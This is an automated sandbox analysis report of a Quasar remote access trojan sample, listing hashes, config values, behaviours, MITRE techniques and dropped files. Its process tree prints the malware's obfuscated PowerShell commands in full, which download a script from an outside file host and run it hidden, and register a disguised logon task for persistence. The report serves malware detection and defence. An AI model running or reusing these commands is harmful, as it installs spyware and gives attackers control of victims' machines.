quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2025, 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winAPI.exe
Size

36.0MB
MD5

fb466528aac78a063f4c60882a33ddc9
SHA1

2af35fa26c27e402e66b7c46d136a4a578f975af
SHA256

6f157135b2b74872f88863cc5bd1edbe8fbe3532dfb9e1b961afca9bb5c77fd3
SHA512

0539f5681271f70262288fcc0b7bd89d63c6c8b8f32f96bd43878df531f9997cde314357f541ca49f58363c484cca80a107b450fd37e3e35e75fd90edac71e77
SSDEEP

393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYf8:fMguj8Q4VfvwqFTrYCl

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral9/memory/4188-59-0x000002A0B0630000-0x000002A0B07BE000-memory.dmp	family_quasar

Blocklisted process makes network request 37 IoCs

flow	pid	Process
20	5880	powershell.exe
65	4188	powershell.exe
66	4188	powershell.exe
67	4188	powershell.exe
68	4188	powershell.exe
70	4188	powershell.exe
71	4188	powershell.exe
72	4188	powershell.exe
73	4188	powershell.exe
74	4188	powershell.exe
75	4188	powershell.exe
76	4188	powershell.exe
80	4188	powershell.exe
82	4188	powershell.exe
83	4188	powershell.exe
84	4188	powershell.exe
85	4188	powershell.exe
88	4188	powershell.exe
90	4188	powershell.exe
91	4188	powershell.exe
92	4188	powershell.exe
93	4188	powershell.exe
94	4188	powershell.exe
95	4188	powershell.exe
96	4188	powershell.exe
97	4188	powershell.exe
98	4188	powershell.exe
99	4188	powershell.exe
100	4188	powershell.exe
101	4188	powershell.exe
102	4188	powershell.exe
103	4188	powershell.exe
104	4188	powershell.exe
105	4188	powershell.exe
106	4188	powershell.exe
107	4188	powershell.exe
108	4188	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5448	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4188	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
5448	powershell.exe
5448	powershell.exe
5880	powershell.exe
5880	powershell.exe
4188	powershell.exe
4188	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeIncreaseQuotaPrivilege	5448	powershell.exe
Token: SeSecurityPrivilege	5448	powershell.exe
Token: SeTakeOwnershipPrivilege	5448	powershell.exe
Token: SeLoadDriverPrivilege	5448	powershell.exe
Token: SeSystemProfilePrivilege	5448	powershell.exe
Token: SeSystemtimePrivilege	5448	powershell.exe
Token: SeProfSingleProcessPrivilege	5448	powershell.exe
Token: SeIncBasePriorityPrivilege	5448	powershell.exe
Token: SeCreatePagefilePrivilege	5448	powershell.exe
Token: SeBackupPrivilege	5448	powershell.exe
Token: SeRestorePrivilege	5448	powershell.exe
Token: SeShutdownPrivilege	5448	powershell.exe
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeSystemEnvironmentPrivilege	5448	powershell.exe
Token: SeRemoteShutdownPrivilege	5448	powershell.exe
Token: SeUndockPrivilege	5448	powershell.exe
Token: SeManageVolumePrivilege	5448	powershell.exe
Token: 33	5448	powershell.exe
Token: 34	5448	powershell.exe
Token: 35	5448	powershell.exe
Token: 36	5448	powershell.exe
Token: SeIncreaseQuotaPrivilege	5448	powershell.exe
Token: SeSecurityPrivilege	5448	powershell.exe
Token: SeTakeOwnershipPrivilege	5448	powershell.exe
Token: SeLoadDriverPrivilege	5448	powershell.exe
Token: SeSystemProfilePrivilege	5448	powershell.exe
Token: SeSystemtimePrivilege	5448	powershell.exe
Token: SeProfSingleProcessPrivilege	5448	powershell.exe
Token: SeIncBasePriorityPrivilege	5448	powershell.exe
Token: SeCreatePagefilePrivilege	5448	powershell.exe
Token: SeBackupPrivilege	5448	powershell.exe
Token: SeRestorePrivilege	5448	powershell.exe
Token: SeShutdownPrivilege	5448	powershell.exe
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeSystemEnvironmentPrivilege	5448	powershell.exe
Token: SeRemoteShutdownPrivilege	5448	powershell.exe
Token: SeUndockPrivilege	5448	powershell.exe
Token: SeManageVolumePrivilege	5448	powershell.exe
Token: 33	5448	powershell.exe
Token: 34	5448	powershell.exe
Token: 35	5448	powershell.exe
Token: 36	5448	powershell.exe
Token: SeIncreaseQuotaPrivilege	5448	powershell.exe
Token: SeSecurityPrivilege	5448	powershell.exe
Token: SeTakeOwnershipPrivilege	5448	powershell.exe
Token: SeLoadDriverPrivilege	5448	powershell.exe
Token: SeSystemProfilePrivilege	5448	powershell.exe
Token: SeSystemtimePrivilege	5448	powershell.exe
Token: SeProfSingleProcessPrivilege	5448	powershell.exe
Token: SeIncBasePriorityPrivilege	5448	powershell.exe
Token: SeCreatePagefilePrivilege	5448	powershell.exe
Token: SeBackupPrivilege	5448	powershell.exe
Token: SeRestorePrivilege	5448	powershell.exe
Token: SeShutdownPrivilege	5448	powershell.exe
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeSystemEnvironmentPrivilege	5448	powershell.exe
Token: SeRemoteShutdownPrivilege	5448	powershell.exe
Token: SeUndockPrivilege	5448	powershell.exe
Token: SeManageVolumePrivilege	5448	powershell.exe
Token: 33	5448	powershell.exe
Token: 34	5448	powershell.exe
Token: 35	5448	powershell.exe
Token: 36	5448	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4188	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4236 wrote to memory of 5952	4236	winAPI.exe	90
PID 4236 wrote to memory of 5952	4236	winAPI.exe	90
PID 5952 wrote to memory of 2316	5952	cmd.exe	91
PID 5952 wrote to memory of 2316	5952	cmd.exe	91
PID 2316 wrote to memory of 5024	2316	cmd.exe	92
PID 2316 wrote to memory of 5024	2316	cmd.exe	92
PID 2316 wrote to memory of 5448	2316	cmd.exe	93
PID 2316 wrote to memory of 5448	2316	cmd.exe	93
PID 2316 wrote to memory of 5880	2316	cmd.exe	95
PID 2316 wrote to memory of 5880	2316	cmd.exe	95
PID 2316 wrote to memory of 4188	2316	cmd.exe	102
PID 2316 wrote to memory of 4188	2316	cmd.exe	102
PID 4188 wrote to memory of 1908	4188	powershell.exe	111
PID 4188 wrote to memory of 1908	4188	powershell.exe	111
PID 1908 wrote to memory of 1728	1908	csc.exe	112
PID 1908 wrote to memory of 1728	1908	csc.exe	112

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5024	attrib.exe

C:\Users\Admin\AppData\Local\Temp\winAPI.exe
"C:\Users\Admin\AppData\Local\Temp\winAPI.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5952
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
      4⤵
      Views/modifies file attributes
      PID:5024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:5880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4188
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\njb5rdwc\njb5rdwc.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1908
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35F0.tmp" "c:\Users\Admin\AppData\Local\Temp\njb5rdwc\CSCFD4732DCCB3A43BDAB43A280464BF254.TMP"
        6⤵
        
        PID:1728

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b57f7bb06a4dd8ea9011c710f92a71be

SHA1
fa34c31d97efb977e4d741765bdbd21465452fc3

SHA256
eec6c051d6411ae5fee977a645a161e0df1fea481ddbc97781bdd6c1f6477335

SHA512
237bb37eda0ebae7ef89a450aabaef4d5b8f3cb2bc19d3513a0df894ffd2fe2f1038b2bdbdf80e6af09a1483106496437cab7716b18253bc97ef58e6f2acb788

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
22405eccf986d4162811b5c749c84a34

SHA1
8aaae3d8c3af237ed22086e33d03d659bdd6a00a

SHA256
3ae9a023a7d9027dc46af805c3b4be68bdb38eea43c731e2ba64c1258696d0d0

SHA512
1ac7a6db411f03119ccd7393783079ea47eec008db1caf87d220cc4f793f1e896ff931cb16227e7d16fef031bb6c02fab9b4d67ab575bc637c64b6a73805a845

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES35F0.tmp

Filesize
1KB

MD5
b9a9fc5aab1e960cb8b9ca56607a5068

SHA1
06f7b1c2d887d36060d612c8ded0feebad474780

SHA256
34e6b2a94d9feab57a50179682cc38d1d417113bb5b0521f0bc00431a2c3eb3f

SHA512
73496d134298b1a708e16336a73bdaed5b1534349526c650323f28ff914add6b2b54c58d9ec8287ff25f87c9faaa4d81582a9f4e93d7609df72d429c34d1b969

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i05lm3n4.e0w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\njb5rdwc\njb5rdwc.dll

Filesize
3KB

MD5
db548d9c72b87770b91695847601e71a

SHA1
41d4c0e24d9511a32b677063bb4565c13f2be3d8

SHA256
aabba21add3a5a657bcad8e5f5b05f3bab4aa88396334d2f6d945cd9b6c81bd3

SHA512
945b16dfc6eefb6d9889980c6a2d938e3b89a34bc8ae888f611581eba140b72cbb3b3f85bfdc2d7395ae6ba2092ec745f8e88be44aea61d545cd67e940d817dd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\njb5rdwc\CSCFD4732DCCB3A43BDAB43A280464BF254.TMP

Filesize
652B

MD5
320ab5e2b62cac422205e45cddd2f932

SHA1
6cef4288becc3f8a51ec3df310d79a158a1dcae4

SHA256
c6476543512e6b80ca5cc1098bd5dc25e5bb6b853f2773066e21680b0d579e85

SHA512
46a4c8431c2fbc1e9c2a7faab06614257d417c7167a01047d6a4dc003e2aaca28a1b3c1ac763dbfdd0817a9f4fdb51a01eb28ede82a89668a2231e7999c81e3b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\njb5rdwc\njb5rdwc.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\njb5rdwc\njb5rdwc.cmdline

Filesize
369B

MD5
ee1518646c6832a24b1d19babd5b697b

SHA1
a2dff9002c7cb88ee111dd7297599c280b2f3926

SHA256
96250e719c2e23f148cca8cdaac9880e021d8acff854f3fbd23741440ebff5e0

SHA512
31b2f0cd1349e44ba4fd63d404f42f7c440f98e8d0bc32ab1604202738425fcfc0c56dbba228eabe50cdab9220b73be1e6e95d5fa9eb8146955a313059ecbc91

Download Submit
memory/4188-55-0x000002A0B0000000-0x000002A0B0008000-memory.dmp

Filesize
32KB

Download
memory/4188-65-0x000002A0B0CB0000-0x000002A0B0CFE000-memory.dmp

Filesize
312KB

Download
memory/4188-68-0x000002A0B05A0000-0x000002A0B05CA000-memory.dmp

Filesize
168KB

Download
memory/4188-67-0x000002A0B0D50000-0x000002A0B0D9A000-memory.dmp

Filesize
296KB

Download
memory/4188-66-0x000002A0B0D00000-0x000002A0B0D4C000-memory.dmp

Filesize
304KB

Download
memory/4188-64-0x000002A0FD660000-0x000002A0FD712000-memory.dmp

Filesize
712KB

Download
memory/4188-57-0x000002A0B0020000-0x000002A0B018A000-memory.dmp

Filesize
1.4MB

Download
memory/4188-59-0x000002A0B0630000-0x000002A0B07BE000-memory.dmp

Filesize
1.6MB

Download
memory/4188-60-0x000002A0B04B0000-0x000002A0B04CA000-memory.dmp

Filesize
104KB

Download
memory/4188-61-0x000002A0B05D0000-0x000002A0B05E2000-memory.dmp

Filesize
72KB

Download
memory/4188-62-0x000002A0B05E0000-0x000002A0B061A000-memory.dmp

Filesize
232KB

Download
memory/4188-63-0x000002A0EAE60000-0x000002A0EAEB0000-memory.dmp

Filesize
320KB

Download
memory/5448-18-0x00007FFB7F400000-0x00007FFB7FEC1000-memory.dmp

Filesize
10.8MB

Download
memory/5448-13-0x0000019F67A40000-0x0000019F67A62000-memory.dmp

Filesize
136KB

Download
memory/5448-15-0x00007FFB7F400000-0x00007FFB7FEC1000-memory.dmp

Filesize
10.8MB

Download
memory/5448-3-0x00007FFB7F403000-0x00007FFB7F405000-memory.dmp

Filesize
8KB

Download
memory/5448-14-0x00007FFB7F400000-0x00007FFB7FEC1000-memory.dmp

Filesize
10.8MB

Download